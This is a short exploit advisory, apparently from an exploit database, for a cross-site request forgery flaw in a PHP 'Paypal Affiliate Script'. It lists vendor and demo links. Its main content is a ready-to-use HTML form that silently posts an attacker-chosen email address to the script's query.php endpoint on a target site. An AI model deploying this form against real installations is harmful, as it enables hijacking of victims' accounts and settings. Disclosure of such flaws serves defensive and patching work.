# Exploit Title: Paypal Affiliate Script CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/php-scripts/affiliate-program-software/phpaffiliate-paypal-affiliate-script/ # Category:: webapps # Demo : http://www.scripts.com/viewscript/phpaffiliate-paypal-affiliate-script/25998/ <form id="form1" name="form1" method="post" action="target.com/[PATH]/library/query.php"> <input type="hidden" value="mail@mail.com" size="40" name="EMAIL"/> <input type="submit" value="Save" name="Submit"/>